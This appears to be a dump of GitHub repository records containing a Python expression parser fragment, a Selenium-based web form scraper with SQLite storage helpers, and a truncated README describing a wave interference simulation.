(term, \"*\", prod)\n\n return term\n\n def t(self):\n \"\"\"\n T → Num | (E)\n \"\"\"\n if self.expr[0] == \"(\":\n self.match(\"(\")\n ex = self.e()\n self.match(\")\")\n\n return ex\n\n # numbers are the leafs of our tree\n # so we just keep them as ints and not tuples\n return self.read_number()\n\n def match(self, symbol):\n \"\"\"\n match provided symbol to the next element in expression\n \"\"\"\n next = self.expr[0]\n self.advance()\n\n if next != symbol:\n raise ValueError\n\n def read_number(self):\n \"\"\"\n read a number from the expression\n \"\"\"\n if not self.expr:\n return\n\n match = NUM.match(self.expr)\n\n if not match:\n raise ValueError\n\n # get the actual number from the match object\n number = match.group(\"NUM\")\n\n self.advance(len(number))\n\n return int(number)\n\n\nif __name__ == \"__main__\":\n Parse.generate(Parse(input(\"enter your expression or q to exit: \")).parser())\n"
}
] | 4 |
ErikFerragut/scraper
|
https://github.com/ErikFerragut/scraper
|
f5a952150f5a018d400cfe75c272cd28c2c91655
|
30dd80d22787b58095253ed378e021fcc54ed835
|
732f5a5d83293ae8ff218135c97405dbf9932310
|
refs/heads/master
| 2023-01-06T00:06:49.374881 | 2021-12-14T22:24:29 | 2021-12-14T22:24:29 | 247,456,659 | 0 | 0 | null | 2020-03-15T11:53:00 | 2021-12-14T22:24:32 | 2022-12-27T16:20:15 |
Python
|
[
{
"alpha_fraction": 0.5945994853973389,
"alphanum_fraction": 0.5985864400863647,
"avg_line_length": 38.69784164428711,
"blob_id": "ff94a549233cacd5ee9806d3e6a4b1e91f402b71",
"content_id": "daadcba5b338bd65eaaf62caad88636147f8e717",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5518,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 139,
"path": "/formscraper.py",
"repo_name": "ErikFerragut/scraper",
"src_encoding": "UTF-8",
"text": "import yaml, time\n\nfrom selenium.common.exceptions import TimeoutException\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport sqlalchemy\nimport click\n\nfrom scrapelib import *\n\n\[email protected]()\ndef cg():\n pass\n\n\[email protected](help='Scan a site to grab form metadata')\[email protected]('--debug', is_flag=True, help='use a visible browser')\[email protected]('--url', required=True, help='site (include http(s)://) with form(s)')\[email protected]('--output', help='output file to store forms meta-data')\[email protected]('--form-tag', default='form', help='by defaults looks for \"form\" tags')\ndef scan(debug, url, output, form_tag):\n # If exploring -- load the page, process the forms, output what we learned\n print('comment: Creating browser')\n browser = create_new_browser(not debug) # create a browser instance and get page\n print('comment: Accessing site \"{}\"'.format(url))\n browser.get(url)\n soup = bs(browser.page_source, 'lxml') # parse the page\n forms = get_forms(soup, form_tag) # extract forms and take the one we want\n print('comment: Writing results to', output)\n if output == 'stdout' or output is None:\n print(yaml.dump(forms))\n else:\n with open(output, 'w') as fout:\n fout.write(yaml.dump(forms))\n browser.close()\n # Use the output to figure out what range of inputs you want to scrape over\n # and put that ino the config yaml file for your scraping project\n\n\[email protected](help='Collect results from a range of form inputs')\[email protected]('--debug', is_flag=True, help='use a visible browser')\[email protected]('--kth', default=1, help='process kth input of every n')\[email protected]('--n', default=1, help='of every n inputs will process the kth')\[email protected]('--max-to-work', default=0, help='max number of inputs to process; 0 for all')\[email protected]('config')\ndef scrape(debug, kth, n, config, max_to_work):\n # 1. read globals and open DB, set derivative values\n G = yaml.load(open(config), yaml.Loader)\n G['form'] = yaml.load(open(G['form_yaml']), yaml.Loader)[G['input_form_id']]\n con = sqlalchemy.create_engine(G['output_db']).connect()\n\n if 'form_wait' in G:\n form_wait_elt = (By.CLASS_NAME if G['form_wait'].get('by') == 'class' else By.ID,\n G['form_wait']['value'], G['form_wait']['delay'])\n form_throttle = G['form_wait'].get('throttle', 0)\n else:\n form_wait_elt = (By.TAG_NAME, 'body', 10)\n form_throttle = 0\n \n if 'table_wait' in G:\n table_wait_elt = (By.CLASS_NAME if G['table_wait'].get('by') == 'class' else By.ID,\n G['table_wait']['value'], G['table_wait']['delay'])\n table_throttle = G['table_wait'].get('throttle', 0)\n no_table_str = G['table_wait'].get('absent_str')\n else:\n table_wait_elt = (By.TAG_NAME, 'body', 10)\n table_throttle = 0\n no_table_str = None\n \n # 2. make sure the inputs and results tables are up to date\n inputs = update_inputs_table(con, G)\n results = updated_results_table(con)\n results = results[ results.index % n == (kth - 1) ]\n\n # 3. grab a not started input from results and see its inputs\n browser = create_new_browser(not debug) # create a browser instance\n last_url = ''\n for i, ind in enumerate(results.index):\n print('Working on input', ind, 'which is', i+1, 'of', len(results.index))\n fill_with = dict(inputs.loc[ind])\n next_url = fill_with.pop('url')\n submit_with = { fill_with.pop('subkey'): fill_with.pop('subval') }\n set_status(con, ind, 'started')\n\n\n print('Going to form page, verifying form has not changed')\n if G.get('form-on-table-page') and last_url != '':\n print('-- form is also on the table page')\n elif last_url == next_url:\n browser.back()\n else:\n browser.get(next_url)\n last_url = next_url\n assert wait_for(browser, *form_wait_elt), 'Form not loading'\n time.sleep(form_throttle)\n page_form = get_forms(bs(browser.page_source, 'lxml'))[G['input_form_id']]\n if page_form != G['form']:\n print('WARNING: page form has changed')\n\n print('Filling and submitting form')\n fill_and_submit(browser, G['form'], fill_with, submit_with)\n if not wait_for(browser, *table_wait_elt):\n if no_table_str in browser.page_source:\n print('No results for this one')\n set_status(con, ind, 'done')\n continue\n else:\n set_status(con, ind, 'error')\n browser.save_screenshot('debug.png')\n os.system('open debug.png')\n raise TimeoutException\n time.sleep(table_throttle)\n\n print('Parsing the table(s)')\n tables = get_tables(browser, G['output_table'])\n\n print('Posting to output table(s)')\n fill_with['url'] = G['url']\n fill_with['subkey'] = list(submit_with.keys())[0]\n fill_with['subval'] = list(submit_with.values())[0]\n fill_with['input_form_id'] = G['input_form_id']\n fill_with['input_index'] = ind\n for name, table in tables.items():\n post_table(con, name, table, **fill_with)\n\n print('Updating results status')\n set_status(con, ind, 'done')\n\n if i+1 == max_to_work:\n break\n\n # 4. close up\n print('Done')\n con.close()\n browser.close()\n\nif __name__ == '__main__':\n cg()\n"
},
{
"alpha_fraction": 0.551260232925415,
"alphanum_fraction": 0.5536105036735535,
"avg_line_length": 34.66184997558594,
"blob_id": "9fc792efc1d5590a611b63d1612c4fea5af84067",
"content_id": "858e470e2211c4257fec5cd8a7954d31791ac4f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12339,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 346,
"path": "/scrapelib.py",
"repo_name": "ErikFerragut/scraper",
"src_encoding": "UTF-8",
"text": "# make sure you:\n# brew cask install chromedriver # for chrome\n# brew install geckodriver # for firefox\n# pip install selenium\n\nimport os, itertools, datetime\n\nimport pandas as pd\nimport sqlalchemy\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait, Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\n# ASSUMPTIONS:\n# 1. Assumes radio button id is linked to with label having for=\"that_id\"\n\n################################################################################\n# Generic functions -- belongs elsewhere\n################################################################################\ndef dict_tree(adict, indent=0):\n indentation = ' ' * (3*indent)\n for key,value in adict.items():\n if isinstance(value, dict):\n print(indentation, key + ':')\n dict_tree(value, indent+1)\n else:\n print(indentation, key + ':', value)\n\n\nclass one_up():\n '''A way of generating new 1-up integers as needed'''\n def __init__(self, first_num=1):\n self.count = first_num - 1\n def __call__(self):\n self.count += 1\n return self.count\n\n\ndef hash_it(something):\n '''Given something, turn it into a string, replace whitespace with | and hash it.\n Returns the hexdigest of the md5 hash.'''\n if isinstance(something, dict):\n the_string = sorted(something.items()) # can break on nested dicts\n the_string = str(something)\n return hashlib.md5('|'.join(the_string.split()).encode()).hexdigest()\n\n\n################################################################################\n# Construct the product iterator for inputs\n################################################################################\ndef to_iterator(key, type, value, options=[]):\n if type == 'const':\n assert isinstance(value, str), 'Type const must have str value'\n return [(key, value)]\n elif type == 'list':\n assert isinstance(value, list), 'Type list must have list value'\n return [(key, v) for v in value]\n elif type == 'all':\n return [(key,option) for option in options]\n elif type == 'all-but':\n assert isinstance(value, list), 'Type all-but must have list value'\n return [(key,option) for option in options if option not in value ]\n elif type == 'slice':\n from_,to_,by_ = map(int, value.split())\n return ((key,x) for x in range(from_,to_,by_))\n else:\n raise KeyError('Unknown variable range type: ' + type)\n \n\ndef form_inputs_to_input_generator(form, form_inputs):\n iterators = {\n k:to_iterator(k, v['type'], v['value'], form['inputs'][k].get('texts', []))\n for k,v in form_inputs.items()\n }\n\n return map(dict, itertools.product(*iterators.values()))\n\n\n################################################################################\n# Scraping functionality\n################################################################################\ndef create_new_browser(headless=True):\n options = webdriver.FirefoxOptions()\n options.headless = headless\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--test-type')\n browser = webdriver.Firefox(\n options=options,\n executable_path='/usr/local/bin/geckodriver'\n )\n return browser\n\n\ndef get_forms(soup, form_container='form'):\n forms = {}\n for form in soup.find_all(form_container):\n newnum = one_up()\n \n id = form.get('id') or newnum()\n form_metadata = { 'id': id }\n\n # process forms -- organize by id b/c name repeats over radio buttons\n inputs = {\n inp.get('id') or newnum():\n {\n 'type':'text',\n 'name':inp.get('name')\n }\n for inp in form.find_all('input', {'type':'text'})\n }\n\n # inputs[name]['options'] = {id1:text1, id2:text2, id3:text3}\n for inp in form.find_all('input', {'type':'radio'}):\n name = inp.get('name') or newnum()\n if name not in inputs:\n inputs[name] = {\n 'type':'radio', 'radio_ids':[], 'label_ids':[], 'label_texts':[]}\n rad_id = inp.get('id')\n label_ids = soup.find_all(attrs={'for':rad_id})\n assert len(label_ids) == 1, 'Broken radio button ' + rad_id\n inputs[name]['radio_ids'].append(rad_id) # currently uses this\n inputs[name]['label_ids'].append(label_ids[0].get('id'))\n inputs[name]['label_texts'].append(label_ids[0].text)\n \n inputs.update( {\n inp.get('id') or newnum():\n {\n 'type':'select',\n 'name':inp.get('name'),\n 'values': [ s.get('value') for s in inp.find_all('option') ],\n 'texts': [ s.text for s in inp.find_all('option') ]\n }\n for inp in form.find_all('select')\n } )\n\n inputs.update( {\n inp.get('id') or newnum():\n {\n 'type':'hidden',\n 'name':inp.get('name')\n }\n for inp in form.find_all('hidden')\n } )\n\n form_metadata['inputs'] = inputs\n\n form_metadata['buttons'] = {\n button.get('id') : button.text\n for button in form.find_all('button')\n }\n\n forms[ id ] = form_metadata\n\n if newnum.count:\n print('WARNING: Form {} had {} id-less elements'.format(id, newnum.count))\n \n return forms\n\n\ndef fill_and_submit(browser, form, fill_with, submit_with):\n '''Takes a browser and a form (from get_forms) to be filled with\n fill_with, a dict from id to value for text and selection, but\n from name to id for radio button. When filled, clicks the button\n whose id is given by submit_with.\n '''\n # uses value_selection AND form\n for k,v in fill_with.items():\n item_type_data = form['inputs'].get(k)\n assert item_type_data is not None, 'Unexpected key: '+k\n\n if item_type_data['type'] == 'text':\n text_element = browser.find_element_by_id(k)\n text_element.clear()\n text_element.send_keys(str(v))\n\n elif item_type_data['type'] == 'select':\n select_element = Select(browser.find_element_by_id(k))\n select_element.select_by_visible_text(v)\n\n elif item_type_data['type'] == 'radio':\n # at least this works for oddshark\n label_elements = browser.find_elements_by_xpath(\"//label[@for='{}']\".format(v))\n assert len(label_elements) == 1, \\\n 'Value {} had {} element matches'.format(v,len(label_lements))\n label_elements[0].click()\n\n if 'id' in submit_with.keys():\n submit_button = browser.find_element_by_id(submit_with['id'])\n elif 'name' in submit_with.keys():\n submit_button = browser.find_element_by_name(submit_with['name'])\n \n submit_button.click()\n # if this doesn't work, do: submit_button.send_keys(Keys.ENTER)\n\n\ndef wait_for(browser, what_type, what_value, delay):\n '''wait_for(By.CLASS_NAME, 'table-wrapper') waits up to delay seconds\n for the class \"table-wrapper\" to load, returning True if it did,\n False o/w. Can also use By.ID.\n ''' \n elt_wait_for = (what_type, what_value)\n delay = 3 # seconds\n try:\n myElem = WebDriverWait(browser, delay).until(\n EC.presence_of_element_located(elt_wait_for))\n return True\n except TimeoutException:\n return False\n \n\ndef get_tables(browser, output_table):\n '''Get tables in the browser's page source selected according to\n output_table, which is a dictionary with a select key.\n\n If select is 'by position' then a which key gives the integer\n (1-up) of which table to return.\n\n If select is 'by positions' then a which key gives the list of all\n tables to return (1-up).\n '''\n tables = pd.read_html(browser.page_source)\n \n table_select = output_table['select']\n if table_select == 'by position':\n tables = [tables[output_table['which']-1]]\n elif table_select == 'by positions':\n tables = [ tables[i-1] for i in tables[output_table['which']] ]\n elif table_select == 'flatten':\n tables = [\n pd.DataFrame([ t.columns[0] + tuple(t.values.flatten()) for t in tables ])\n ]\n else:\n raise KeyError('Unknown select \"{}\" for output_table'.format(table_select))\n\n table_names = output_table.get('table_names') or [ output_table['table_name'] ]\n\n return dict(zip(table_names, tables))\n \n################################################################################\n# Storage into Database\n################################################################################\ndef set_status(con, ind, status, status_table='results'):\n con.engine.execute('''\n update {}\n set status = '{}',\n last_update = datetime('now')\n where id = '{}' \n '''.format(status_table, status, ind))\n\n\ndef update_inputs_table(con, G):\n '''Update input table with the rows from form_inputs (BUGGY!)'''\n inputs = pd.DataFrame(list(\n form_inputs_to_input_generator(G['form'], G['form_inputs'])))\n inputs['url'] = G['url']\n inputs['subkey'] = list(G['submit_with'].keys())[0]\n inputs['subval'] = list(G['submit_with'].values())[0]\n\n if 'inputs' in con.engine.table_names(): # read the existing inputs\n old_inputs = pd.read_sql('select * from inputs', con, index_col='id')\n both_inputs = pd.concat([old_inputs, inputs])\n repeats = both_inputs.duplicated(keep='first')\n is_new_input = ~repeats.values[ len(old_inputs): ]\n num_new = is_new_input.sum()\n print('Found {} of {} new inputs are not in {} old inputs'.format(\n num_new, len(inputs), len(old_inputs)))\n\n if num_new:\n last_index = old_inputs.index.max()\n inputs.index = pd.RangeIndex(last_index, last_index + len(inputs))\n \n print('Updating inputs table')\n inputs.to_sql(\n name='inputs',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n else:\n print('No input table present. Creating {} rows'.format(len(inputs)))\n inputs.to_sql(\n name='inputs',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n\n return pd.read_sql(\"select * from inputs\", con, index_col='id')\n\n\ndef updated_results_table(con):\n no_status_table = pd.read_sql('inputs', con)[ ['id'] ].assign(\n status = 'not started',\n last_update = datetime.datetime.now()\n ).set_index('id')\n\n if 'results' in con.engine.table_names():\n actual_status = pd.read_sql('results', con, index_col='id')\n new_indices = set(no_status_table.index).difference(actual_status.index)\n append_this = no_status_table.loc[new_indices]\n print('Updating results table with {} rows'.format(len(append_this)))\n else:\n print('Creating results table')\n append_this = no_status_table\n\n append_this.to_sql(\n name='results',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n\n return pd.read_sql(\"select * from results where status <> 'done' and status <> 'error'\",\n con, index_col='id')\n\n\ndef post_table(con, table_name, table, **scrape_args):\n '''Post a table to the named output table.\n\n Takes table, augments with constant columns from scrape_args, and\n posts to the table called table_name accessible via connection\n con. Also augments with a timestamp, which it returns.\n '''\n timestamp = datetime.datetime.now()\n scrape = scrape_args.copy()\n scrape['posted'] = timestamp\n scrapes = []\n\n for k,v in scrape.items():\n table[k] = v\n\n table.to_sql(\n name = table_name,\n con = con,\n if_exists = 'append',\n index = False,\n )\n"
}
] | 2 |
chandangs16/Assignment1-D_D_S
|
https://github.com/chandangs16/Assignment1-D_D_S
|
aceb08cde517270d44daa996358bcda33f75bad4
|
5fb732745502388a9635d19de81531f40a316f41
|
4682c6682b964e5a9459c2626ebb9e9f2cbf372d
|
refs/heads/master
| 2021-05-04T11:55:10.121397 | 2017-01-30T07:41:23 | 2017-01-30T07:41:23 | 80,314,054 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6138669848442078,
"alphanum_fraction": 0.6219842433929443,
"avg_line_length": 32.22097396850586,
"blob_id": "50a1aa760d0d19a83a77043768596049619f12a6",
"content_id": "d8f380389f1fe9c69c19035d40d9623746e35d83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8870,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 267,
"path": "/Interface.py",
"repo_name": "chandangs16/Assignment1-D_D_S",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2.7\n#\n# Interface for the assignement\n#\nimport sys\nimport psycopg2\n\nDATABASE_NAME = 'dds_assgn1'\nRATINGS_TABLE = 'Ratings'\nMAX_RATING = 5.0\nMIN_RATING = 0.0\nRANGE_TABLE_NAME=\"range_part\"\nROUND_ROBIN_TABLE=\"rrobin_part\"\nINPUT_FILE_PATH='E:/Python Projects/Proj1/ratings.dat'\nRANGE_PARTITIONS= 0\nRROBIN_PARTITIONS=0\n\nMETADATA_TABLE=\"metadata_table\"\n\n\ndef getopenconnection(user='postgres', password='cgsasu123', dbname='dds_assgn1'):\n return psycopg2.connect(\"dbname='\" + dbname + \"' user='\" + user + \"' host='localhost' password='\" + password + \"'\")\n\n\n\n\ndef loadratings( ratingstablename, ratingsfilepath, openconnection):\n\n with open(ratingsfilepath,'r') as doc:\n docs = doc.read()\n docs = docs.replace('::',':')\n with open(ratingsfilepath,'w') as doc:\n doc.write(docs)\n\n curs=openconnection.cursor()\n curs.execute(\"DROP TABLE if EXISTS \" + ratingstablename)\n curs.execute(\"CREATE TABLE \"+ratingstablename + \"(UserID INT, MovieID INT,Rating REAL, temp varchar(10)); \")\n\n\n movie_data=open(ratingsfilepath,'r')\n print(\"before copy\")\n curs.copy_from(movie_data, ratingstablename, sep=':', columns=('UserID', 'MovieID', 'Rating', 'temp'))\n curs.execute(\"ALTER TABLE \" + ratingstablename + \" DROP COLUMN temp\")\n\n\n\n\n curs.execute(\"DROP TABLE if EXISTS \" + METADATA_TABLE)\n\n curs.execute(\"CREATE TABLE \" + METADATA_TABLE + \"(table_type INT,num_partitions INT, partition_range REAL,next_table INT); \")\n curs.execute(\"INSERT INTO \" + METADATA_TABLE + \" VALUES (%d,%d,%f,%d)\" % (1,0,0,0)) # 1 is range_part. 2 is rrobin_part\n curs.execute(\"INSERT INTO \" + METADATA_TABLE + \" VALUES (%s,%d,%f,%d)\" % (2, 0, 0, 0))\n print(\"meta\")\n\n\n curs.close()\n\n\n\ndef rangepartition(ratingstablename, numberofpartitions, openconnection):\n try:\n curs = openconnection.cursor()\n RANGE_PARTITIONS=numberofpartitions\n partition_range = MAX_RATING/numberofpartitions\n for i in range(0, numberofpartitions):\n minVal = i * partition_range\n maxVal = minVal + partition_range\n tableName = RANGE_TABLE_NAME + str(i)\n curs.execute(\"DROP TABLE IF EXISTS \" + tableName)\n # print(RANGE_TABLE_NAME+\"_\"+\"%s\" %i)\n curs.execute(\"CREATE TABLE \"+tableName+\"(UserID INT, MovieID INT,Rating REAL)\")\n print(\"after create\")\n if i==0:\n curs.execute(\"INSERT INTO \"+tableName + \" SELECT * from \"+ratingstablename + \" where Rating >= \"+str(minVal)+\" AND Rating <= \"+str(maxVal))\n #print(\"sdcas\")\n else:\n curs.execute(\"INSERT INTO \" + tableName + \" SELECT * from \" + ratingstablename + \" where Rating > \"+str(minVal)+\" AND Rating <= \"+str(maxVal))\n curs.execute(\"Update \"+METADATA_TABLE+\" SET num_partitions = \"+str(numberofpartitions)+\", partition_range =\"+str(partition_range)+\" WHERE table_type=%d;\"%(1))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\ndef roundrobinpartition(ratingstablename, numberofpartitions, openconnection):\n\n curs=openconnection.cursor()\n RROBIN_PARTITIONS=numberofpartitions\n for i in range(0,numberofpartitions):\n tableName = ROUND_ROBIN_TABLE + `i`\n curs.execute(\"DROP TABLE IF EXISTS \" + tableName)\n curs.execute(\"CREATE TABLE \"+tableName+\"(UserID INT, MovieID INT,Rating REAL)\")\n curs.execute(\"select * from \"+ratingstablename)\n file = curs.fetchall()\n print(\"after fetch\")\n # print(row)\n\n i=0\n for data in file:\n tableName= ROUND_ROBIN_TABLE + `i`\n # print(tableName)\n curs.execute(\"INSERT INTO \"+tableName+\" VALUES (%s, %s, %s)\" % (data[0], data[1], data[2]))\n i=i+1\n # print(i)\n i=i%numberofpartitions\n # print(\"i=\"+str(i))\n curs.execute(\"Update \"+METADATA_TABLE+\" SET num_partitions =\"+str(numberofpartitions)+\", next_table=\"+str(i)+\"WHERE table_type=%d;\"%(2))\n\n\n curs.close()\n\n\n\n\ndef roundrobininsert(ratingstablename, userid, itemid, rating, openconnection):\n curs=openconnection.cursor()\n try:\n print \"inside try\"\n curs.execute(\"Select num_partitions, next_table from \"+METADATA_TABLE+\" where table_type=%d ;\"%(2))\n meta_data=curs.fetchone()\n num_partitions=meta_data[0]\n print(num_partitions)\n print meta_data[0]\n next_table=meta_data[1]\n print next_table\n\n\n\n curs.execute(\"Insert into \"+ROUND_ROBIN_TABLE+str(next_table)+\" values ( %s,%s,%s)\" %(userid,itemid,rating))\n next_table+=1\n next_table=next_table%num_partitions\n curs.execute(\"Update \"+METADATA_TABLE+\" SET next_table =\"+str(next_table)+\" where table_type=%d ;\"%(2))\n\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\ndef rangeinsert(ratingstablename, userid, itemid, rating, openconnection):\n curs = openconnection.cursor()\n try:\n print \"inside try\"\n print rating\n curs.execute(\"Select num_partitions, partition_range from \" + METADATA_TABLE + \" where table_type=%d ;\" % (1))\n meta_data = curs.fetchone()\n num_partitions = meta_data[0]\n\n print(num_partitions)\n #print meta_data[0]\n partition_range = meta_data[1]\n print partition_range\n temp=[]\n for i in range(0,5.0):\n temp.append(i*partition_range)\n for i in range(5):\n if(temp[i]>rating):\n x=i\n x=x-1\n\n curs.execute(\"Insert into \" + ROUND_ROBIN_TABLE + str(x) + \" values ( %s,%s,%s)\" % (userid, itemid, rating))\n\n #next_table = next_table % num_partitions\n #curs.execute(\"Update \" + METADATA_TABLE + \" SET next_table =\" + str(next_table) + \" where table_type=%d ;\" % (2))\n\n\n\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\n\ndef delete_partitions(openconnection):\n curs = openconnection.cursor()\n curs.execute(\"SELECT num_partitions, table_type FROM \"+METADATA_TABLE)\n rows = curs.fetchall()\n for row in rows:\n num_partitions = row[0]\n t_type=row[1]\n if t_type==1:\n table_type=RANGE_TABLE_NAME\n else:\n table_type=ROUND_ROBIN_TABLE\n for i in range(0,num_partitions):\n table_name=table_type+'i'\n curs.execute(\"DROP TABLE if EXISTS \"+table_name)\n curs.execute(\"DROP TABLE IF EXISTS \"+ METADATA_TABLE)\n curs.close()\n\n\n\n\n\ndef create_db(dbname):\n \"\"\"\n We create a DB by connecting to the default user and database of Postgres\n The function first checks if an existing database exists for a given name, else creates it.\n :return:None\n \"\"\"\n # Connect to the default database\n con = getopenconnection(dbname='postgres')\n con.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n cur = con.cursor()\n\n # Check if an existing database with the same name exists\n cur.execute('SELECT COUNT(*) FROM pg_catalog.pg_database WHERE datname=\\'%s\\'' % (dbname,))\n count = cur.fetchone()[0]\n if count == 0:\n cur.execute('CREATE DATABASE %s' % (dbname,)) # Create the database\n else:\n print 'A database named {0} already exists'.format(dbname)\n\n # Clean up\n cur.close()\n con.close()\n\n\n# Middleware\ndef before_db_creation_middleware():\n # Use it if you want to\n pass\n\n\ndef after_db_creation_middleware(databasename):\n # Use it if you want to\n pass\n\n\ndef before_test_script_starts_middleware(openconnection, databasename):\n # Use it if you want to\n pass\n\n\ndef after_test_script_ends_middleware(openconnection, databasename):\n # Use it if you want to\n pass\n\n\nif __name__ == '__main__':\n try:\n\n # Use this function to do any set up before creating the DB, if any\n before_db_creation_middleware()\n\n create_db(DATABASE_NAME)\n after_db_creation_middleware(DATABASE_NAME)\n\n with getopenconnection() as con:\n # Use this function to do any set up before I starting calling your functions to test, if you want to\n before_test_script_starts_middleware(con, DATABASE_NAME)\n comm = sys.argv[1]\n print(sys.argv[0])\n\n loadratings(RATINGS_TABLE, 'E:/Python Projects/Proj1/Tester/test_data.dat', con)\n rangepartition(RATINGS_TABLE, 5, con)\n roundrobinpartition(RATINGS_TABLE, 4, con)\n rangeinsert(RATINGS_TABLE, 10, 12, 3, con)\n\n after_test_script_ends_middleware(con, DATABASE_NAME)\n\n except Exception as detail:\n print \"OOPS! This is the error ==> \", detail\n"
}
] | 1 |
tomnwright/Interference-Simulation
|
https://github.com/tomnwright/Interference-Simulation
|
d1c28bc8b031778546552e23b22b534910ac53a7
|
5129bc2c7be973ee13dc79e6699955c0f350915f
|
d86c172aa70d9474967b4c21ad747d5fa5c38716
|
refs/heads/master
| 2022-10-19T17:01:27.653640 | 2022-10-18T09:39:19 | 2022-10-18T09:39:19 | 192,102,371 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6842496395111084,
"alphanum_fraction": 0.6952451467514038,
"avg_line_length": 191.2857208251953,
"blob_id": "44fcea916df1ab502f3865482ed389f39f09b6fd",
"content_id": "a4a4625436ced4d29bee03261c5a79cc69ad2121",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6730,
"license_type": "no_license",
"max_line_length": 1508,
"num_lines": 35,
"path": "/README.md",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "# Interference-Simulation\nSimulation of the interference pattern between *n* coherent[<sup>1</sup>](https://github.com/tomnwright/Interference-Simulation/issues/2) sources. Each source is assigned a pixel location. Then, for each pixel, the distance from that pixel to each source is calculated and used to calculate the amplitude of the wave from each source. These amplitudes are added to find the superposition of all waves at that point. A separate function interpolates between blue (-1), white (0), and red (+1), and is used to assign each pixel a colour based on its wave superposition. Wave functions return between -1 (trough) and +1 (peak), but the superposition of these waves may exceed this range.\n\nThe amplitude, *I*, of the wave from each source at a given pixel is calculated as a function of the distance of that pixel to the source. For source A:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;\\sin{d}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?I&space;=&space;\\sin{d}\" title=\"I = \\sin{d}\" /></a>\n\nThis produces a wave with a wavelength of <a href=\"https://www.codecogs.com/eqnedit.php?latex=2\\pi\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?2\\pi\" title=\"2\\pi\" /></a>. Therefore scaling the function along the *d* axis by a factor of\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{\\lambda&space;s}{2\\pi}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?\\frac{\\lambda&space;s}{2\\pi}\" title=\"\\frac{\\lambda s}{2\\pi}\" /></a>\n\n, where *s* is the number of pixels per unit distance (pixel **s**cale), produces a wave with a wavelength of *s* px:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;\\sin{\\frac{2\\pi&space;d}{\\lambda&space;s}}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?I&space;=&space;\\sin{\\frac{2\\pi&space;d}{\\lambda&space;s}}\" title=\"I = \\sin{\\frac{2\\pi d}{\\lambda s}}\" /></a>\n\nNext the wave is translated along the x axis as a function of the amount of time which has passed, allowing animation. If the wave moves along the *d* axis at a rate of one wavelength per second, then its dispacement, *k* is given as:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=\\begin{align*}&space;k&space;&=&space;t_{seconds}&space;\\cdot&space;\\lambda&space;s&space;+&space;p&space;\\lambda&space;s\\\\&space;&=&space;\\frac{t&space;\\lambda&space;s}{f}+&space;p&space;\\lambda&space;s&space;\\end{align*}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?\\begin{align*}&space;k&space;&=&space;t_{seconds}&space;\\cdot&space;\\lambda&space;s&space;+&space;p&space;\\lambda&space;s\\\\&space;&=&space;\\frac{t&space;\\lambda&space;s}{f}+&space;p&space;\\lambda&space;s&space;\\end{align*}\" title=\"\\begin{align*} k &= t_{seconds} \\cdot \\lambda s + p \\lambda s\\\\ &= \\frac{t \\lambda s}{f}+ p \\lambda s \\end{align*}\" /></a>, where:\n* *t* is time in frames, and *f* is video frame rate.\n* *p* is phase, as a fraction of wavelength\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=\\begin{align*}&space;\\therefore&space;I&space;&=&space;\\sin{\\frac{2\\pi&space;(d-k)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(d-\\frac{t&space;\\lambda&space;s}{f}&space;-&space;p&space;\\lambda&space;s)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(\\frac{fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s}{f})}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{align*}\" target=\"_blank\"><img 